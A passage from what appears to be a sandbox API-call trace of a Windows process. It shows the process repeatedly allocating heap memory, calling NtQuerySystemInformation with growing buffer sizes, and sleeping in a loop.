hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.134] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.135] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.135] Sleep (dwMilliseconds=0x110) [0235.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.161] Sleep (dwMilliseconds=0x110) [0235.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.177] Sleep (dwMilliseconds=0x110) [0235.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.204] Sleep (dwMilliseconds=0x110) [0235.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.223] Sleep (dwMilliseconds=0x110) [0235.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.239] Sleep (dwMilliseconds=0x110) [0235.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.254] Sleep (dwMilliseconds=0x110) [0235.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.284] Sleep (dwMilliseconds=0x110) [0235.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.305] Sleep (dwMilliseconds=0x110) [0235.309] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.309] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.317] Sleep (dwMilliseconds=0x110) [0235.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.332] Sleep (dwMilliseconds=0x110) [0235.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.348] Sleep (dwMilliseconds=0x110) [0235.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.363] Sleep (dwMilliseconds=0x110) [0235.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.378] Sleep (dwMilliseconds=0x110) [0235.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) 